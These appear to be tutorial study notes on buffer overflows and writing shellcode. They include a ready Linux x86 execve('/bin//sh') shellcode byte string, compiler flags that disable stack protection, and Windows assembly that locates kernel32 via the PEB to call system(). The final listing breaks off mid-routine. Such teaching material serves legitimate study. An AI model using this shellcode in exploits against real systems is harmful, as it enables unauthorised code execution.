[Web Resource Study Notes] Notes on Shellcode

What is Shellcode

Put simply, shellcode is a piece of code that is executed by exploiting a software vulnerability; it is usually written down as hexadecimal machine code. When a buffer overflow overwrites control data (a saved return address, for example) so that the CPU starts executing the shellcode's machine code, the attacker obtains whatever effect the shellcode was written for, typically arbitrary code execution.

This article has two parts: generating shellcode, and looking at the shellcode produced by common security tools.

Basics

Common instruction sets (x86, x86_64, ARM) and assembly fundamentals

What a computer actually understands is a low-level language built to control the hardware. Assembly is that low-level language: it describes and controls what the CPU does directly. If you want to know what the CPU really does and in what order the code runs, you have to learn assembly.

The CPU only computes; it has no intelligence of its own. You hand it an instruction, it executes it once, then stops and waits for the next one.

Those instructions are binary and are called operation codes (opcodes). On x86, for example, one encoding of the add instruction has the opcode 0x03 (00000011). A compiler's job is to translate a program written in a high-level language into a sequence of these opcodes.

Binary programs are unreadable to humans; you cannot tell what the machine is doing from them. Assembly language exists to solve that readability problem and to cover the occasional need to edit machine code by hand.

Each CPU family has its own machine instructions, so each has its own assembly language. First, be clear that x86, x86_64, arm64 and so on are names of CPU instruction-set architectures. Roughly:

x86 architecture: a rich instruction set and strong performance. The Intel and AMD processors in today's desktops and laptops are x86 processors.

  • x86 (also called i386 / IA-32): the 32-bit variant

  • x64 (also called x86-64 / amd64 / Intel 64): the 64-bit variant

ARM architecture: a small instruction set, small circuitry, low power and low heat, which makes it a good fit for embedded and portable devices such as phones, tablets and industrial embedded systems.

  • arm / A32 / arm32 (AArch32): the 32-bit execution state; A32 instructions are 32-bit fixed length

  • A64 / arm64 (AArch64): the 64-bit execution state; its A64 instructions are still 32-bit fixed length, but registers and addresses are 64-bit

Registers

In the usual description, a CPU consists of registers, a control unit and an arithmetic/logic unit:

  • Registers: hold the instructions, data and other objects being processed; they can be thought of as a small, very fast kind of memory inside the CPU.
  • Control unit: reads instructions and data from memory into the registers and steers the whole machine according to the results of executing them.
  • Arithmetic/logic unit: performs the arithmetic on the data that was read from memory into the registers.

From these roles it is clear how central the registers are, which is why learning assembly on any architecture revolves around how the registers are used.

Supplement:

Besides the three parts above, a CPU also has a clock.

Clock: emits the clock signal that paces the CPU's work (on some computers the clock sits outside the CPU). The clock signal's frequency is measured in hertz (Hz), cycles per second; the higher the frequency, the faster the CPU runs.

The registers are classified as follows:

[figure: register classification (image in the original)]

How data is stored while a program runs

When a program runs, the operating system gives it a region of memory to hold the program itself and the data it produces. That region has a start address and an end address, say from 0x1000 to 0x8000; the start address is the smaller one and the end address the larger one.

[figure: memory region with start and end addresses (image in the original)]

When the running program asks for memory dynamically (creating an object, or calling malloc), the system carves a piece out of that pre-allocated region, handing it out from the start address upward (in reality there is a block of static data at the start address, ignored here). For example, if the program asks for 10 bytes, it gets the bytes from 0x1000 up to, but not including, 0x100A; if it then asks for another 22 bytes, that allocation runs up to 0x1020.

[figure: heap growing upward from the start address (image in the original)]

Simply put, the stack is the memory region temporarily occupied while functions run. It starts at the end address of the region and is handed out from high addresses toward low addresses.

[figure: stack growing downward from the end address (image in the original)]

int main() {
   int a = 2;
   int b = 3;
}

When the system starts executing the main function above, it creates a frame for it in memory, and all of main's internal variables (a and b here) live in that frame. When main finishes, the frame is reclaimed, freeing all of its internal variables so they no longer take up space.

[figure: main's stack frame (image in the original)]

int main() {
   int a = 2;
   int b = 3;
   return add_a_and_b(a, b);
}

In the code above, main calls add_a_and_b. When execution reaches that line, the system creates a new frame for add_a_and_b to hold its internal variables. In other words, two frames now exist at the same time: main's and add_a_and_b's. In general, the call stack has as many frames as it has levels.

[figure: two frames, main and add_a_and_b (image in the original)]

When add_a_and_b finishes, its frame is reclaimed and the system returns to the point in main where execution was interrupted and continues from there. This mechanism is what makes nested function calls work while letting each level use its own local variables.

In short:

Stack: managed by the system; typically holds function arguments, local variable values and the like.

Heap: the programmer requests it with an explicit size and is also responsible for freeing it; whatever is not freed is reclaimed by the OS when the program exits.

Basic assembly instructions

Look it up on Baidu.

C language basics

Format-string vulnerabilities (formatted output vulnerabilities)

Buffer overflows

The examples below were compiled in an Ubuntu container under Docker.

Heap overflow

A heap overflow, put simply, is writing more into a heap variable than the space allocated for it, so the data (and the chunk metadata) of the neighbouring heap chunks gets overwritten. Heap memory is normally obtained with malloc(); malloc only hands out the memory and does not initialise it, so the contents of a freshly returned block are indeterminate, whatever happened to be there before. It is released with free().

Here is the simplest example, built on gets. This topic is covered widely online, so anything unclear is easy to look up.

[screenshot: the demo's source, two malloc(10) buffers job and name filled with gets (image in the original)]

During compilation gcc warns that gets is dangerous and should be replaced; ignore that for now.

[screenshot: gcc's warning about gets (image in the original)]

Running the program:

[screenshot: normal run (image in the original)]

Now look back at the code: we asked malloc for 10 bytes, but the usable space is larger (these notes measured 16; malloc rounds every request up to the allocator's chunk granularity, and 64-bit glibc turns a 10-byte request into a 32-byte chunk with 24 usable bytes, so the exact figure depends on the allocator and architecture). By the definition of a heap overflow, input longer than the requested space overwrites whatever sits in the adjacent chunk, so an over-long value typed for job overwrites the contents of name. Running it:

[screenshot: over-long input for job corrupts name (image in the original)]

The heap overflow has been triggered; let's follow the program in gdb.

Breakpoint 1: gets(job)

[screenshot: gdb at the first breakpoint (image in the original)]

Here you can see that job was requested as 10 bytes while gets went on to accept 16; gets imposes no limit at all, since it has no idea how large the buffer is.

Breakpoint 2: printf("your name is %s\n", name)

[screenshot: gdb at the second breakpoint (image in the original)]

The program runs normally, and after stepping out it prints "your name is swallow". Now the same run with input longer than the requested space:

[screenshot: gdb with the over-long input (image in the original)]

Comparing the two breakpoints, the original contents at 0xaaaaddbf92c0 have been overwritten by the over-long input. Continuing:

[screenshot: continued execution (image in the original)]

Because %s prints from name until it meets a NUL byte, and the overflow has run straight through name, the overflowing characters are pulled into what is printed, and the output becomes:

[screenshot: corrupted "your name is" output (image in the original)]
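The demo above survives only as screenshots, so here is a self-contained C version of it, added to these notes (it is not the original program): two malloc(10) buffers, an unbounded copy into the first that runs into the second, and the bounded counterpart. The buffer names job and name, the constructed input and the unbounded_copy/raw_copy helpers are my choices; the heap is repaired afterwards so both chunks can still be freed.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define REQ 10                    /* the demo's two malloc(10) buffers */

/* Byte-for-byte copy with no length check, the behaviour of gets()/strcpy().
 * Written by hand so the compiler's fortified string functions cannot abort
 * the demonstration before it happens. */
static void unbounded_copy(char *dst, const char *src)
{
    volatile char *d = dst;
    while ((*d++ = *src++) != '\0') ;
}

static void raw_copy(char *dst, const char *src, size_t n)
{
    volatile char *d = dst;
    for (size_t i = 0; i < n; i++) d[i] = src[i];
}

/* Reproduces the demo: job is allocated first, name second, and an over-long
 * value written into job runs into name.  Returns 1 when name was clobbered,
 * 0 when it survived, -1 when the allocator did not place the two chunks next
 * to each other (then there is nothing to demonstrate). */
int heap_overflow_demo(void)
{
    char *job  = malloc(REQ);
    char *name = malloc(REQ);
    if (!job || !name) return -1;
    unbounded_copy(name, "swallow");                 /* fits: 7 chars + NUL */

    /* Distance between the two user pointers.  On 64-bit glibc a 10-byte
     * request becomes a 32-byte chunk, so this is 32, and the 8-byte size
     * field of name's chunk sits in the last 8 bytes of the gap. */
    if ((uintptr_t)name < (uintptr_t)job) { free(name); free(job); return -1; }
    uintptr_t gap = (uintptr_t)name - (uintptr_t)job;
    if (gap > 256) { free(name); free(job); return -1; }

    /* Keep a copy of everything from job to the end of name, name's chunk
     * header included, so the heap can be put back and freed afterwards. */
    size_t span = gap + REQ;
    char *saved = malloc(span);
    if (!saved) { free(name); free(job); return -1; }
    raw_copy(saved, job, span);

    /* Constructed input, longer than the 10 bytes requested: enough 'A's to
     * reach into name, exactly what an over-long line typed into gets(job) does. */
    char input[512];
    memset(input, 'A', span - 1);
    input[span - 1] = '\0';
    unbounded_copy(job, input);                      /* heap overflow */

    int clobbered = name[0] == 'A';
    raw_copy(job, saved, span);                      /* repair the heap */
    free(saved); free(name); free(job);
    return clobbered;
}

/* The fix: bound the copy by the size that was actually requested.
 * Returns 1 when name is intact after filling job. */
int heap_bounded_demo(void)
{
    char *job  = malloc(REQ);
    char *name = malloc(REQ);
    if (!job || !name) return -1;
    snprintf(name, REQ, "%s", "swallow");
    char input[512];
    memset(input, 'A', sizeof input - 1);
    input[sizeof input - 1] = '\0';
    snprintf(job, REQ, "%s", input);                 /* at most 9 chars + NUL */
    int intact = strcmp(name, "swallow") == 0;
    free(name); free(job);
    return intact;
}

int main(void)
{
    printf("unbounded copy clobbered name: %d\n", heap_overflow_demo());
    printf("bounded copy kept name intact: %d\n", heap_bounded_demo());
    return 0;
}
```

Build it without optimisation-based surprises (gcc -O0 is fine) and run it; the first line prints 1 on glibc, where the two chunks are adjacent, and the second always prints 1.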

Stack overflow

With the heap overflow understood, the stack overflow is easier; the difference is that stack space is allocated by the system rather than requested by the program.

First, a simple example of a stack overflow caused by strcpy (because of gcc's compile-time protections, we go straight to gdb for the analysis):

First compile and run the program normally:

[screenshot: normal compile and run (image in the original)]

Breakpoint: printf("%s\n", output);

[screenshot: gdb at the breakpoint (image in the original)]

[screenshot: normal output (image in the original)]

From the breakpoint and the run we can see that the system gave the program a 52-byte region starting at 0xaaaadd260660 to do its work in. Now make the string handed to strcpy longer than output.

[screenshot: source with the longer string (image in the original)]

Same breakpoint:

[screenshot: gdb at the breakpoint with the long string (image in the original)]

Because of gcc's compile-time protection no exception is raised here, but looking at 0xffffc9b48698 we can see that the top of the stack has already been corrupted. Looking straight at the stack when the program finishes:

[screenshot: stack at program exit (image in the original)]

Inspecting the final stack, the stack top has changed. gcc also prints a warning when you compile this normally:

[screenshot: gcc warning (image in the original)]

Repeating the steps in an Ubuntu VM gives:

[screenshot: the same run in the Ubuntu VM (image in the original)]

To keep stray factors from influencing the result, it is best to use a real environment for this.
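As an added example (not the page's program), here is a C model of what the strcpy overflow and gcc's stack protector do to a frame: a 16-byte buffer followed by a canary word and a slot standing in for the saved return address. The struct layout, the canary value, the placeholder return address and the unbounded_copy helper are assumptions made for the demonstration; a real frame has the canary and return address placed by the compiler, not by a struct.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* A hand-built frame: the buffer strcpy() writes into, then the word a stack
 * protector places after it, then the slot that in a real frame holds the
 * saved return address. */
struct frame {
    char     output[16];
    uint32_t canary;
    uint32_t saved_ret;
};

#define CANARY   0xA5C3E1F7u     /* assumed canary value */
#define RET_ADDR 0x08048500u     /* placeholder "return address" */

/* Unbounded copy, the behaviour of strcpy()/gets(): it stops only at NUL. */
static void unbounded_copy(char *dst, const char *src)
{
    volatile char *d = dst;       /* keep the overrun visible to the compiler */
    while ((*d++ = *src++) != '\0') ;
}

/* Copies `input` into output the unsafe way and reports what got hit:
 * bit 0 = canary overwritten (what -fstack-protector aborts on at return),
 * bit 1 = the return-address slot overwritten (what an exploit aims for).
 * Keep the input below sizeof(struct frame) so the overrun stays in the frame. */
int smash_frame(const char *input, uint32_t *ret_out)
{
    struct frame f;
    memset(&f, 0, sizeof f);
    f.canary = CANARY;
    f.saved_ret = RET_ADDR;
    /* Address the buffer through the whole struct so the overrun stays inside
     * one object (the frame), just as it does on a real stack. */
    unbounded_copy((char *)&f + offsetof(struct frame, output), input);
    int result = 0;
    if (f.canary != CANARY) result |= 1;
    if (f.saved_ret != RET_ADDR) result |= 2;
    if (ret_out) *ret_out = f.saved_ret;
    return result;
}

/* The bounded version: the copy is sized to the buffer and always terminated,
 * so neither the canary nor the return slot can be reached. */
int safe_frame(const char *input)
{
    struct frame f;
    memset(&f, 0, sizeof f);
    f.canary = CANARY;
    f.saved_ret = RET_ADDR;
    snprintf(f.output, sizeof f.output, "%s", input);
    return (f.canary != CANARY) || (f.saved_ret != RET_ADDR);
}

int main(void)
{
    uint32_t ret;
    /* 16 'A's: the terminating NUL alone lands in the canary */
    printf("16 bytes: %d\n", smash_frame("AAAAAAAAAAAAAAAA", &ret));
    /* 16 'A's, 4 'B's into the canary, 3 'C's into the return slot */
    printf("23 bytes: %d, ret=%#x\n", smash_frame("AAAAAAAAAAAAAAAABBBBCCC", &ret), (unsigned)ret);
    printf("bounded:  %d\n", safe_frame("AAAAAAAAAAAAAAAABBBBCCC"));
    return 0;
}
```

The 16-byte case is the one gcc's canary is designed to catch: the copy fits the characters but the NUL lands on the canary's first byte, which is exactly why the protector's check fails at function return even though no return address was touched.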

Writing Shellcode

Linux

This part was done on Ubuntu. Reason: macOS no longer ships the 32-bit C libraries, and the assembly involved needs the 32-bit libraries; a 64-bit Linux can still build and run 32-bit binaries, and I did not want to fight unrelated problems, so Ubuntu was the simple, direct choice.

The general approach is an int 0x80 system call: put the number of the system call you want in eax, pass its arguments in the other registers, and trap into the kernel.

Writing the C/C++ code

First, write C/C++ code that gets a shell on Linux:

[screenshot: C source that spawns a shell (image in the original)]

Compile and run it:

[screenshot: compile and run (image in the original)]

Writing the assembly

Shellcode, simply put, is the hexadecimal machine code produced for a piece of assembly. In this step the C/C++ code from the previous step is rewritten in assembly; the result:

[screenshot: the assembly listing (image in the original)]

Extracting the machine code

[screenshot: assembling, linking and dumping the bytes (image in the original)]

With the few steps in the screenshot we obtain the machine code for 32-bit, i.e. x86, Linux:

\x31\xc0\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xb0\x0b\xcd\x80

Read back, those 23 bytes are: xor eax,eax; xor edx,edx; push edx (the terminating NUL); push "//sh"; push "/bin"; mov ebx,esp (ebx now points at "/bin//sh"); xor ecx,ecx; mov al,0xb (the execve number); int 0x80. In other words execve("/bin//sh", NULL, NULL).

The machine code can then be dropped into an exploit for a buffer overflow we have found, or into any other code, for example:

[screenshot: stack.c embedding the shellcode (image in the original)]

Compile and run; it prompts that root privileges are required.

[screenshot: running stack (image in the original)]

gcc -m32 -g -z execstack -fno-stack-protector -o stack stack.c

  • In detail:
    • gcc has a stack-protection mechanism (stack canaries) to stop buffer overflows; when compiling this code, turn it off with -fno-stack-protector;
    • -z execstack makes the stack executable;
    • -m32 produces 32-bit code on a 64-bit machine; -g adds debugging information.

Error: /usr/include/stdio.h:27:10: fatal error: bits/libc-header-start.h: No such file or directory

Fix: sudo apt install gcc-multilib

Cause: the 32-bit library headers are missing.

Other notes

When pushing the string, the assembly looked like this:

[screenshot: push of "/sh" versus "//sh" (image in the original)]

The machine code it produced is shown below. A 0x00 byte inside shellcode is fatal whenever the payload is delivered as a C string (by gets, strcpy and the like): the copy stops at the NUL, the shellcode is truncated, and it never runs properly. On Linux "//" in a path means the same as "/", so pushing "//sh" instead of "/sh" pads the immediate to a full 4 bytes without introducing a NUL, and the code runs as intended.

[screenshot: machine code with and without the 00 byte (image in the original)]

How int 0x80 works

Step one: put the system call number into eax.
Step two: ebx holds the first argument of the call; ecx, edx, esi and edi hold arguments 2 to 5, and ebp holds the sixth.
The execve shellcode above needs only three of them: ebx = path, ecx = argv (NULL), edx = envp (NULL), with eax = 11.
Once the registers are loaded, executing int 0x80 raises a software interrupt that forces the kernel to suspend what it is doing and service it; that is how the call reaches the kernel's system call handler.

Windows

Windows has no int 0x80 interface for reaching functions the way Linux does, although it does have system calls (reached through ntdll with syscall/sysenter). Windows is more work than Linux: the functions we want live in DLLs, so the shellcode has to locate them through the DLL's export information, which means first finding the DLL itself in memory.

Writing the C/C++ code

On Windows, start VC++ 6.0, write and run the code; the result:

[screenshot: VC++ program calling system("dir") (image in the original)]

The code runs the dir command through system and shows the command's output.

Writing the assembly

Following the Linux approach, we now write assembly to generate the Windows shellcode, copying the Linux pattern; the result:

[screenshot: first assembly attempt (image in the original)]

Here the "dir" string we pass is merely pushed onto the stack; it is never executed by system. This is the big difference between Windows and Linux: to write the assembly we have to know the memory address of the function that executes the command.

Getting the address

To get the address of system: because of ASLR the same function is not at the same address on every machine (nor across reboots of the same machine, since system DLLs are relocated at boot), so a hardcoded address is only good for the machine and session it was taken from. A small program that prints the address gives:

[screenshot: printing the address of system (image in the original)]

Rewriting the assembly

The above gives one way to write shellcode locally: get the function's address, push the data and call it. The machine code can then be read out of VC++'s debugger. But shellcode generated from that assembly only works in one place and is not portable, so in this section we rewrite the assembly to be portable and self-contained.

I hit a great many snags in this section, mostly environmental. After much trying I gave up and switched to VC++ on XP SP3; the earlier Windows material was done on Windows 7, and compiling this section there fails with:

[screenshot: VC++ build error on Windows 7 (image in the original)]

This section is long, so first, the actual result when it runs:

[screenshot: the portable shellcode running dir (image in the original)]

Next, the flow of the whole program.

1. Find kernel32.dll in memory

To call a function we need its address; to get there we need to load the library it lives in, which means LoadLibrary(); to find LoadLibrary we need GetProcAddress(), which is exported by kernel32.dll. So the three things to locate are kernel32.dll, GetProcAddress() and LoadLibrary().

As explained earlier, to produce reliable shellcode we follow a fixed sequence of steps. We know which functions to call, but first we must find them, and the steps for obtaining a function's address were discussed above.

kernel32.dll can be found through the PEB. The following code walks the loader's in-memory module list (it loads nothing; kernel32.dll is already mapped in every process). It assumes the third entry of InMemoryOrderModuleList is kernel32.dll (executable, ntdll, kernel32), which holds on the Windows versions used here; shellcode meant for arbitrary targets usually hashes module names instead of relying on position.

xor ecx, ecx
mov eax, fs:[ecx + 0x30]        ; EAX = PEB
mov eax, [eax + 0xc]            ; EAX = PEB->Ldr
mov esi, [eax + 0x14]           ; ESI = PEB->Ldr.InMemOrder
lodsd                           ; EAX = Second module
xchg eax, esi                   ; EAX = ESI, ESI = EAX
lodsd                           ; EAX = Third(kernel32)
mov ebx, [eax + 0x10]           ; EBX = Base address

2. Find its export table

With kernel32.dll located in memory, parse its PE header and find the export table.

mov edx, [ebx + 0x3c]           ; EDX = DOS->e_lfanew
add edx, ebx                    ; EDX = PE Header
mov edx, [edx + 0x78]           ; EDX = Offset export table
add edx, ebx                    ; EDX = Export table
mov esi, [edx + 0x20]           ; ESI = Offset names table
add esi, ebx                    ; ESI = Names table
xor ecx, ecx                    ; ECX = 0

3. Find GetProcAddress among kernel32.dll's exports

We are now at AddressOfNames, an array of RVAs (offsets from kernel32's load address), one 4-byte entry per exported name, each pointing at a function's name string. Loop over it comparing names, counting as we go so that we know the position of GetProcAddress in the name table (the index later used to look up its ordinal):

;循环查找GetProcAddress函数
Get_Function:
        inc ecx                                          ; Increment the ordinal
        lodsd                                            ; Get name offset
        add eax, ebx                                     ; Get function name
        cmp dword ptr[eax], 0x50746547                   ; GetP
        jnz Get_Function
        cmp dword ptr[eax + 0x4], 0x41636f72             ; rocA
        jnz Get_Function
        cmp dword ptr[eax + 0x8], 0x65726464             ; ddre
        jnz Get_Function
4. Use the name's ordinal to get GetProcAddress's address

So far we only have the position of GetProcAddress in the name table (ECX is one past it, because the loop increments before reading). AddressOfNameOrdinals maps that position to an index into AddressOfFunctions, which holds the RVA of the function:

dec ecx                            ; ECX = index of the matching name
mov esi, [edx + 0x24]              ; ESI = Offset ordinals
add esi, ebx                       ; ESI = Ordinals table
mov cx, [esi + ecx * 2]            ; CX = unbiased ordinal = index into the address table
mov esi, [edx + 0x1c]              ; ESI = Offset address table
add esi, ebx                       ; ESI = Address table
mov edx, [esi + ecx * 4]           ; EDX = Pointer(offset)
add edx, ebx                       ; EDX = GetProcAddress

Two details worth knowing. The comparison checks only the first 12 characters, so "GetProcAddressForCaller" would match too; the name table is sorted alphabetically, so GetProcAddress is always hit first. And a common variant of this listing reads the ordinal first and decrements afterwards (mov cx, [esi + ecx * 2] followed by dec ecx): that fetches the ordinal of the next name minus one, which only equals the right index when the ordinals are consecutive, as they happen to be in kernel32.
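To check the walk of steps 2 to 4 without a Windows box, here is an added C example (not the page's code) that builds a tiny synthetic PE image in memory with only the fields the shellcode reads (e_lfanew, the export data directory at PE+0x78, AddressOfFunctions, AddressOfNames, AddressOfNameOrdinals) and performs the same lookup, comparing 12 bytes of each name. The export names, their ordinals and the function RVAs are invented for the test; the buggy flag reproduces the ordinal-before-decrement variant so you can see when the two diverge.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Synthetic image layout (all values are RVAs, i.e. offsets from the base). */
#define IMG_SIZE    0x600
#define E_LFANEW    0x3c
#define PE_OFF      0x80
#define EXPORT_DIR  0x200      /* IMAGE_EXPORT_DIRECTORY            */
#define FUNCS_OFF   0x280      /* AddressOfFunctions (uint32 RVAs)  */
#define NAMES_OFF   0x300      /* AddressOfNames     (uint32 RVAs)  */
#define ORDS_OFF    0x380      /* AddressOfNameOrdinals (uint16)    */
#define STRINGS_OFF 0x400

static void     put32(uint8_t *img, uint32_t off, uint32_t v) { memcpy(img + off, &v, 4); }
static void     put16(uint8_t *img, uint32_t off, uint16_t v) { memcpy(img + off, &v, 2); }
static uint32_t get32(const uint8_t *img, uint32_t off) { uint32_t v; memcpy(&v, img + off, 4); return v; }
static uint16_t get16(const uint8_t *img, uint32_t off) { uint16_t v; memcpy(&v, img + off, 2); return v; }

/* Invented export names, sorted as the linker writes them. */
static const char *const names[] = {
    "CreateFileA", "ExitProcess", "GetProcAddress", "GetProcAddressForCaller", "LoadLibraryA"
};
#define NNAMES 5

/* Builds the image.  With `sequential` set, name i maps to function i (how
 * kernel32 happens to be laid out); otherwise the ordinals are shuffled.
 * Function i gets the distinctive RVA 0x1000 + 0x100 * i. */
void build_image(uint8_t *img, int sequential)
{
    static const uint16_t shuffled[NNAMES] = { 3, 0, 4, 1, 2 };
    memset(img, 0, IMG_SIZE);
    img[0] = 'M'; img[1] = 'Z';
    put32(img, E_LFANEW, PE_OFF);
    memcpy(img + PE_OFF, "PE\0\0", 4);
    put32(img, PE_OFF + 0x78, EXPORT_DIR);      /* export data directory RVA */
    put32(img, EXPORT_DIR + 0x14, NNAMES);       /* NumberOfFunctions */
    put32(img, EXPORT_DIR + 0x18, NNAMES);       /* NumberOfNames */
    put32(img, EXPORT_DIR + 0x1c, FUNCS_OFF);
    put32(img, EXPORT_DIR + 0x20, NAMES_OFF);
    put32(img, EXPORT_DIR + 0x24, ORDS_OFF);
    uint32_t str = STRINGS_OFF;
    for (uint32_t i = 0; i < NNAMES; i++) {
        uint16_t ord = sequential ? (uint16_t)i : shuffled[i];
        put32(img, NAMES_OFF + 4 * i, str);
        put16(img, ORDS_OFF + 2 * i, ord);
        put32(img, FUNCS_OFF + 4 * ord, 0x1000 + 0x100 * ord);
        strcpy((char *)img + str, names[i]);
        str += (uint32_t)strlen(names[i]) + 1;
    }
}

/* The walk the assembly performs.  name12 is the 12-byte prefix compared as
 * three dwords ("GetP" "rocA" "ddre").  Returns the function RVA, or 0. */
uint32_t find_export(const uint8_t *img, const char *name12, int buggy)
{
    uint32_t pe     = get32(img, E_LFANEW);        /* mov edx, [ebx + 0x3c] */
    uint32_t expdir = get32(img, pe + 0x78);       /* mov edx, [edx + 0x78] */
    uint32_t names_ = get32(img, expdir + 0x20);   /* AddressOfNames        */
    uint32_t ords   = get32(img, expdir + 0x24);   /* AddressOfNameOrdinals */
    uint32_t funcs  = get32(img, expdir + 0x1c);   /* AddressOfFunctions    */
    uint32_t nnames = get32(img, expdir + 0x18);
    uint32_t nfuncs = get32(img, expdir + 0x14);
    uint32_t ecx = 0;                              /* xor ecx, ecx          */
    for (;;) {                                     /* Get_Function:         */
        if (ecx >= nnames) return 0;               /* bound the asm lacks   */
        uint32_t rva = get32(img, names_ + 4 * ecx);
        ecx++;                                     /* inc ecx; lodsd        */
        if (memcmp(img + rva, name12, 12) == 0) break;
    }
    uint32_t idx;                                  /* ecx is one past the match */
    if (buggy) {                                   /* mov cx,[ords+ecx*2]; dec ecx */
        if (ecx >= nnames) return 0;               /* the asm would read past the table */
        idx = (uint32_t)get16(img, ords + 2 * ecx) - 1u;
    } else {                                       /* dec ecx; mov cx,[ords+ecx*2] */
        ecx--;
        idx = get16(img, ords + 2 * ecx);
    }
    if (idx >= nfuncs) return 0;
    return get32(img, funcs + 4 * idx);
}

/* Convenience wrapper: build an image and look one name up. */
uint32_t demo_lookup(int sequential, int buggy, const char *name12)
{
    uint8_t img[IMG_SIZE];
    build_image(img, sequential);
    return find_export(img, name12, buggy);
}

int main(void)
{
    printf("sequential ordinals: correct %#x, buggy %#x\n",
           (unsigned)demo_lookup(1, 0, "GetProcAddre"), (unsigned)demo_lookup(1, 1, "GetProcAddre"));
    printf("shuffled ordinals:   correct %#x, buggy %#x\n",
           (unsigned)demo_lookup(0, 0, "GetProcAddre"), (unsigned)demo_lookup(0, 1, "GetProcAddre"));
    return 0;
}
```

With sequential ordinals both variants return the same RVA, which is why the shortcut passes unnoticed against kernel32; with shuffled ordinals the buggy walk hands back a different export entirely, and in real shellcode that means calling the wrong function with GetProcAddress's arguments.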
5. Use LoadLibrary to load the DLL

With GetProcAddress() we can find the address of LoadLibraryA(). There is no export actually named LoadLibrary(): that name is a macro resolving to LoadLibraryA() (ANSI) or LoadLibraryW() (Unicode), so LoadLibraryA() is the one to look up.

xor ecx, ecx            ; ECX = 0
push ebx                ; Kernel32 base address
push edx                ; GetProcAddress
push ecx                ; 0
push 0x41797261         ; aryA
push 0x7262694c         ; Libr
push 0x64616f4c         ; Load
push esp                ; “LoadLibraryA”
push ebx                ; Kernel32 base address
call edx                ; GetProcAddress(LL)

At this point the portable part of calling anything on Windows is done; what remains is finding the particular target function. With GetProcAddress() in hand we can obtain the address of any function.

6. Find the function's address in the DLL

We found LoadLibrary's address earlier; now use it to load "msvcrt.dll", the library that contains our system function, into memory.
One wrinkle: "msvcrt.dll" is 10 characters, two short of a multiple of 4, and the string must end in a NUL. Writing the last two characters through cx (any 16-bit register would do) keeps the NUL out of the instruction stream: cx is the low 16 bits of ecx, so after ecx has been zeroed, mov cx, 0x6c6c leaves ecx = 0x00006c6c ("ll" followed by two NUL bytes on the stack) with no bad characters in the code.

add esp, 0xc                ; pop “LoadLibraryA”
pop  ecx                    ; ECX = 0
push eax                    ; EAX = LoadLibraryA
push ecx                    ; 6d737663   72742e64 6c6c 
mov  cx, 0x6c6c             ; ll
push ecx
push 0x642e7472             ; rt.d
push 0x6376736d             ; msvc
push esp                    ; “msvcrt.dll”
call eax                    ; LoadLibrary(“msvcrt.dll”)

While writing this you can substitute any DLL for msvcrt.dll, as long as you mind the byte count.

7. Call the function

With msvcrt.dll loaded, call GetProcAddress to get the address of system.
Again, to avoid bad characters, the string is padded out to a multiple of 4 bytes with filler letters that are then subtracted away on the stack. The low-16-bit register trick from the previous step would have worked just as well.
Keep the stack arithmetic in mind: the add esp, 0x10 that follows the call removes the three dwords of "system" plus the saved LoadLibraryA address, leaving GetProcAddress and the kernel32 base on top of the stack for the exit sequence.

add esp, 0x10                   ; Clean stack
mov edx, [esp + 0x4]            ; EDX = GetProcAddress
xor ecx, ecx                    ; ECX = 0
push ecx                        ;73797374 656d
mov  ecx,0x61626d65             ;emba
push ecx
sub dword ptr[esp + 0x3], 0x61  ; Remove “a”
sub dword ptr[esp + 0x2], 0x62  ; Remove “b”
push 0x74737973                 ; syst
push esp                        ; system
push eax                        ; msvcrt.dll address
call edx                        ; GetProc(system)

Here the code written earlier can be dropped straight into the framework, provided the stack stays balanced.

add esp, 0x10                   ; Cleanup stack: "system" (3 dwords) + saved LoadLibraryA
push ebp
mov  ebp,esp
sub  esp,0x4                    ; room for the 4-byte string
xor  esi,esi
mov  esi,0x00726964             ; "dir" + NUL (note: this immediate puts a 0x00 byte in the shellcode)
mov  dword ptr[ebp-04h],esi
lea  esi, [ebp-04h]
push esi
call eax                        ; system("dir"); cdecl, so the caller removes the argument

add esp, 0x8                    ; Clean stack: the argument and the local
pop esi                         ; discards the saved ebp (ebp is never restored; ExitProcess follows)

8. Find the address of ExitProcess

The function has run; to exit without raising an error we need to terminate the process cleanly, so we look up ExitProcess in kernel32.dll.

;exit the process
pop edx                         ; GetProcAddress
pop ebx                         ; kernel32.dll base address
mov ecx, 0x61737365             ; essa
push ecx
sub dword ptr [esp + 0x3], 0x61 ; Remove "a" -> "ess" + NUL
push 0x636f7250                 ; Proc
push 0x74697845                 ; Exit
push esp                        ; "ExitProcess"
push ebx                        ; kernel32.dll base address
call edx                        ; GetProcAddress(ExitProcess)

9. Call ExitProcess

Finally, call ExitProcess(0):

xor ecx, ecx                   ; ECX = 0
push ecx                       ; Return code = 0
call eax                       ; ExitProcess

Supplement

Viewing machine code in VC++

Once in the debugger, open the View menu and choose the debug window, as shown:

[screenshot: View menu, debug windows (image in the original)]

Then pick the circled option from the right-click menu.

[screenshot: right-click menu with the code-bytes option circled (image in the original)]

Now the machine code corresponding to each instruction is displayed.

[screenshot: disassembly with code bytes (image in the original)]

Complete code

void main()
{
    _asm
    {
        xor ecx, ecx
        mov eax, fs:[ecx + 0x30] ; EAX = PEB
        mov eax, [eax + 0xc]     ; EAX = PEB->Ldr
        mov esi, [eax + 0x14]    ; ESI = PEB->Ldr.InMemOrder
        lodsd                    ; EAX = Second module
        xchg eax, esi            ; EAX = ESI, ESI = EAX
        lodsd                    ; EAX = Third(kernel32)
        mov ebx, [eax + 0x10]    ; EBX = Base address
        mov edx, [ebx + 0x3c]    ; EDX = DOS->e_lfanew
        add edx, ebx             ; EDX = PE Header
        mov edx, [edx + 0x78]    ; EDX = Offset export table
        add edx, ebx             ; EDX = Export table
        mov esi, [edx + 0x20]    ; ESI = Offset namestable
        add esi, ebx             ; ESI = Names table
        xor ecx, ecx             ; EXC = 0

    Get_Function:
        inc ecx                              ; Increment the ordinal
        lodsd                                ; Get name offset
        add eax, ebx                         ; Get function name
        cmp dword ptr[eax], 0x50746547       ; GetP
        jnz Get_Function
        cmp dword ptr[eax + 0x4], 0x41636f72 ; rocA
        jnz Get_Function
        cmp dword ptr[eax + 0x8], 0x65726464 ; ddre
        jnz Get_Function
        dec ecx                              ; ECX = index of the matching name (loop left it one too high)
        mov esi, [edx + 0x24]                ; ESI = Offset ordinals
